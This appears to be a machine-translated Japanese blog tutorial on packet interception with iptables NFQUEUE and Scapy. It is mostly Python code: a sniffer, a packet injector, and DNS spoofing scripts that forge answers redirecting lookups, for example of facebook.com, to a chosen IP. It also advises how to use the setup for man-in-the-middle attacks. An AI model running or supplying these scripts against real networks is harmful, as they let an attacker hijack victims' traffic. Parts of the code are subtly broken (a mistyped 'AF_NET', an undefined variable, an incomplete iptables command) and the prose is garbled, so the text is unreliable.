背景1Nfqueue
Nfqueueはiptablesとip6tablesのターゲットであり、このターゲットはデータパケットをユーザースペースに配信できます。たとえば、次のiptablesルール
iptables -A INPUT -j NFQUEUE --queue-num 0
次に、ユーザースペースで、libnetfilter_queueを使用してキュー0(デフォルト)に接続し、カーネルからメッセージを取得できます。次に、このパケットに決定を与える必要があります(Drop、Acceptなど)。
一般に、iptablesには5つのタイプのターゲットがあります(ACCEPT、DROP、RETURN、QUEUE、other_chain、およびNFQUEUEはQUEUEの拡張です。QUEUEと比較して、異なるキュー番号を持つユーザーが指定できます。
背景2scapy
データを監視する前に、ブログScapyの基本的な学習を書きました。
from scapy.all import *
def callback(pkt):
if pkt.haslayer(TCP):
print pkt.summary()
print pkt.show()
print pkt[TCP]
sniff(filter=”port 80”, prn=callback, store=0, iface=’wlan0’)
データを注入する
pkt=Ether()/IP(dst="new.ycombinator.com")/TCP()/"GET /index.html HTTP/1.0 \n\n"
send(pkt)
dns_spoofの例:
from scapy.all import *
def dns_spoof(pkt):
redirect_to = '192.168.115.110'
if pkt.haslayer(DNSQR): # DNS question record
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa = 1, qr=1, \
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=redirect_to))
send(spoofed_pkt)
print 'Sent:', spoofed_pkt.summary()
sniff(filter='udp port 53', iface='wlan0', store=0, prn=dns_spoof)
Scapy + nfqueueパケットの傍受、変更、転送
1.最初に簡単な例を見てください。
import nfqueue
from scapy.all import *
import os
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):
data = payload.get_data()
pkt = IP(data)
payload.set_verdict(nfqueue.ACCEPT)
def main():
q = nfqueue.queue()
q.open()
q.bind(socket.AF_NET)
q.set_callback(callback)
q.create_queue(0)
try:
q.try_run() # Main loop
except KeyboardInterrupt:
q.unbind(socket.AF_INET)
q.close()
os.system('iptables -F')
os.system('iptables -X')
main()
2.データパッケージを変更する方法を確認します。
import nfqueue
from scapy.all import *
import os
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):
data = payload.get_data()
pkt = IP(data)
if pkt.haslayer(DNSQR): # Beginning modifications
pkt[IP].dst = '192.168.115.118'
pkt[IP].len = len(str(pkt))
pkt[UDP].len = len(str(pkt[UDP]))
del pkt[IP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
def main():
q = nfqueue.queue()
q.open()
q.bind(socket.AF_INET)
q.set_callback(callback)
q.create_queue(0)
try:
q.try_run() # Main loop
except KeyboardInterrupt:
q.unbind(socket.AF_INET)
q.close()
os.system('iptables -F')
os.system('iptables -X')
main()
注:ここでは、payload.set_verdict_modified(nfqueue.NF_ACCEPT、str(pkt)、len(pkt))に注意してください。これは、iptablesとnfqueueを使用してデータを送信するか、set_verdict_modified()関数を使用しないためです。これはcallbakで行うことができます:
payload.set_verdict(NF_DROP)
send(modified_packet)
3.最後の完全なDNSプルーフの例
import nfqueue
from scapy.all import *
import os
domain = 'facebook.com'
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):
data = payload.get_data()
pkt = IP(data)
if not pkt.haslayer(DNSQR):
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
if domain in pkt[DNS].qd.qname:
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=localIP))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
print '[+] Sent spoofed packet for %s' % domain
def main():
q = nfqueue.queue()
q.open()
q.bind(socket.AF_INET)
q.set_callback(callback)
q.create_queue(0)
try:
q.try_run() # Main loop
except KeyboardInterrupt:
q.unbind(socket.AF_INET)
q.close()
os.system('iptables -F')
os.system('iptables -X')
sys.exit('losing...')
main()
中間者攻撃の場合、iptablesルールをos.system( 'iptables -t nat PREROUTING -p udp --dport 53 -j NFQUEUE')に変更して機能させる必要があります。
関連情報:
https://blog.csdn.net/wang_walfred/article/details/50475912
http://security.maruhn.com/netfilter-hacking-howto/
http://www.grep.it/RMD/05-Netfilter.pdf
http://security.maruhn.com/iptables-tutorial/x9983.html
http://bbs.chinaunix.net/thread-1939832-1-1.html
http://bbs.chinaunix.net/thread-1960139-1-1.html
http://dac01.sakura.ne.jp/projects/firewall/iptips.html
http://sourcecodebrowser.com/nfqueue-bindings/0.1/nfq__common_8c.html
http://ytliu.info/blog/2013/03/29/netfilterxue-xi-bi-ji-(er-)/
http://stackoverflow.com/questions/27244736/wrong-tcp-checksum-calculation-by-scapy